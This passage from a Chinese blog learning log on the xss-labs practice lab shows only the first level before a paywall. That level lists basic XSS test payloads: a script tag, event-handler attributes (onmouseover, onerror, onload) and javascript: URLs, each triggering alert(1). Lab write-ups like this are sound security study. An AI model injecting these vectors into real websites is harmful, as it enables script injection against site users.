网安学习日志 XSS靶机训练(xss-labs-master)(1-10)

最新推荐文章于 2025-05-27 20:12:36 发布
最新推荐文章于 2025-05-27 20:12:36 发布
阅读量5.1k 收藏 4
点赞数
分类专栏: 学习日志 文章标签: xss 安全 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41819426/article/details/122580866
版权
这篇博客记录了作者在XSS靶机xss-labs-master中的学习历程,从第一关到第十关,详细阐述了每关的解题思路和技巧。包括对URL参数、过滤机制的分析,以及如何通过JavaScript、标签属性等绕过防御措施,展示了XSS攻击的各种常见方法和应对策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.第一关

在这里插入图片描述
页面中我们并没有看到输入框,但是我们看到url中可以进行name值的修改。
在这里插入图片描述
看起来应该没有任何的过滤,我们直接输入语句尝试:

<script>alert(1)</script>

在这里插入图片描述
这里还可以用很多方法,以下列举一些常用的方法:

<input type=“text” onmouseover=alert(1)>
<a href="javascript:alert(1)">a</a>
<a onmouseover=“javascript:alert(1)”>a</a>
<image src=1 onerror=alert(1)>
<iframe src=‘javascript:alert(1)’>
<iframe onload=alert(1)>
<svg onload=alert(1)>

2.第二关

最低0.47元/天 解锁文章
Android图像处理值Region
gu_solo的博客
03-23 1039
Region.op:当两个区域重合时该如何处理,有6个取值: DIFFERENCE::从region1中减去region2 INTERSECT:区region1和region3部分 REPLACE:用region2替换region1 REVERCE_DIFFERENCE:从region2中减去region1 UNION:合并region1和region2 XOR:取region1和re
opengl api
gangyanliang的专栏
08-22 1204
OpenGL库函数列表 OpenGl核心函数库   glAccum 操作累加缓冲区 glAddSwapHintRectWIN 定义一组被SwapBuffers拷贝的三角形 glAlphaFunc允许设置alpha检测功能 glAreTexturesResident 决定特定的纹理对象是否常驻在纹理内存中 glArrayElement 定义一个被用于顶点渲染的数组成分 glBegin
OPENGL中的帧缓存区概述
weixin_30732825的博客
02-19 367
(1)帧缓存介绍 OPENGL系统的帧缓冲区是由所有存储着像素信息的缓冲区组成的,包括:颜色缓冲区、深度缓冲区、模板缓冲区、累积缓冲区。可以使用glGetIntegerv()查询特定画面可用的缓冲区的存储信息。 颜色缓冲区是用于绘图的缓冲区,它包含了颜色索引或者RGB颜色数据,还可能有alpha数据。若OPENGL支持立...
OpenGL库函数列表
水云间
06-30 1225
<br />OpenGl核心函数库 glAccum 操作累加缓冲区<br />glAddSwapHintRectWIN 定义一组被SwapBuffers拷贝的三角形<br />glAlphaFunc允许设置alpha检测功能<br />glAreTexturesResident 决定特定的纹理对象是否常驻在纹理内存中<br />glArrayElement 定义一个被用于顶点渲染的数组成分<br />glBegin,glEnd 定义一个或一组原始的顶点<br />glBindTexture 允许建立一个绑定
OpenGL帧缓冲区
weixin_34232744的博客
11-19 391
OpenGL窗口中, 左下角的像素为(0, 0). 一般而言, 像素(x, y)占据的矩形区域左下角为(x, y), 右上角为(x+1, y+1). 10.1 缓存及其用途 1) 颜色缓存, 左前,右前,左后,右后和任意数量的辅助颜色缓存;2) 深度缓存3) 模板缓存4) 累积缓存 注意:X窗口系统,RGBA模式至少保证1个颜色缓冲区,模板缓冲区,深度缓冲区,累计缓冲区颜色索引模式至...
WARNING: The scripts pip, pip3 and pip3.9 are installed in '/home/lgc/.local/bin' which is not on PATH. Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.
07-07
关于您的问题,您可以通过将'/home/lgc/.local/bin'目录添加到您的PATH环境变量中来解决此警告。这样做的方法会因操作系统而有所不同,下面是一些常见操作系统的解决方法: 对于Linux和macOS用户: 1. 打开终端。 2...
Inconsolata-LGC:Inconsolata LGC扩展
02-05
Inconsolata-LGC:Inconsolata LGC扩展
Opengl LGC_Lsys.rar
02-27
一个用opengl编写的植物根生长系统。
LGC算法-SCI经典
09-16
LGC算法,全称为Learning with Local and Global Consistency,是一种图学习算法,主要用于图上的半监督学习。该算法利用图的结构特征来传播标签信息,使具有相似结构的节点标签趋于一致。LGC算法的提出,是为了更好...
OpenGL实现的植物根系生长模拟系统
标题中的“Opengl LGC_Lsys.rar”指的是一个利用OpenGL图形库编写的程序文件包。OpenGL(Open Graphics Library)是一个跨语言、跨平台的应用程序编程接口(API),用于渲染2D和3D矢量图形。该库广泛应用于计算机...
Opengl纹理映射
wymhhgg99的专栏
01-11 1417
9.4 纹理对象 使用纹理对象来存储纹理数据的步骤: 1) 生成纹理对象名称 2) 将纹理对象绑定到纹理数据(包括图像数据数组和纹理属性), 即创建纹理对象. 3) 如果OpenGL实现高性能纹理工作集, 应检查是否有足够的空间来存储所有的纹理对象. 如没有足够空间, 应设置每个纹理对象的优先级, 以确保最常用的纹理留在工作集中 4) 绑定和重新绑定纹理对象, 以便可以将其中的纹理
opengl函数
鶸者为何战斗
06-03 745
1.glAccum--操作在多重缓冲区中进行; 2.glAlphaFunc--指定Alpha测试函数; 3.glBegin--开始操纵一组点进行画图; 4.glBitmap--再设备上画一指定属性的位图文件; 5.glBlendFunc--指定象素的算法; 6.glCallList-- 执行一个显示列表; 7.glCallLists-- 执行一组显示列表; 8.glClear--在视
帧缓冲区
依文依叶
07-04 3511
1.帧缓存包括颜色、scissor、alpha、stencil、depth这些缓存,所以帧缓存不是一片缓存,而是所有这些缓存的组合,帧缓存它对应了屏幕上的每一个pixel(不是真正的pixel,而是一个fragment所对应的位置)的各种这些信息(颜色、ZBUFFER、等等),几何体的fragment时没有帧缓存的,帧缓存时屏幕上的,一个缓存的一位就对应一个位片面。 Colorbuffer是最终
OpenGL系列教程之十一:OpenGL网格化
10-22 9463
网格化是将凹多边形或有边相交的多边形划分成凸多边形。由于openGL渲染时只接受凸多边形,这些非凸多边形在渲染之前必须先被网格化。 第一行中第一个图形是4条边的凹多边形,第二个图形中间有个洞,第三个图形有相交的边 下载:tessellation.zip,stencilTest.zip 概述 网格化基本的步骤是将所有非凸多边形的顶点坐标
WPF【11_4】WPF实战-重构与美化(MVVM 架构)
keke10的专栏
05-27 837
点击刷新, UI 则会通过发送事件的方式通知视图模型,而视图模型在收到刷新请求以后,就会去数据库提取数据,然后重新把数据提供给视图。最后,视图与模型之间由于加入了视图模型,所以产生了系统的分层,而数据也得到了有效的隔离,它们之间则是一个间接引用的关系。虽然对于一个 WPF 项目来说,仅仅使用 Model 和 View, 甚至只使用 View 也能完成各种各样复杂的功能,比如说上一章我们的实战项目只有 View, 同样也可以完成客户预约系统的开发。而视图模型作为业务逻辑的载体,也会承担与数数据库的沟通工作。
springboot--实战--大事件--用户接口开发
最新发布
m0_73856804的博客
05-27 1864
定义了一种简洁的、自包含的格式,用于通信双方以JSON数据格式安全的传输信息。组成:第一部分:Header(头),记录令牌类型、签名算法等。例如,算法用于防篡改第二部分:Payload(有效载荷),携带一些自定义信息,默认信息。例如。而外在表示为一段无规律的64个可打印字符原因:借助base64编码方式(Base64:是一种基于64个可打印字符(A-Z a-z 0-9 + /)来表示二进制数据的编码方式)来完成,将json字符串变为64个可打印字符,
21. 自动化测试框架开发之Excel配置文件的测试用例改造
Tom的专栏
05-20 1397
本文介绍了如何通过Excel配置文件实现自动化测试用例的改造。首先,测试框架的核心架构依赖于unittest、paramunittest、页面对象模型和Excel数据读取器。其次,通过ExcelReader加载Excel数据,支持参数化测试。测试用例参数化方案包括使用paramunittest和subTest,后者支持单测试方法管理多组数据,失败时继续执行后续用例。关键技术点包括数据驱动流程和异常处理机制,确保测试失败时自动截图并保留异常堆栈。Excel数据规范要求第一行为标题行,列名与代码参数对应。工程实
SpringMVC(结合源码浅析工作流程)
weixin_45865163的博客
05-23 857
Spring MVC是基于前端控制器()设计模式的 Web 框架,在 Web 应用中指一个统一的入口,用来接收所有客户端请求,并统一进行分发、处理。在SpringMVC中,前端控制器就是Controller。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值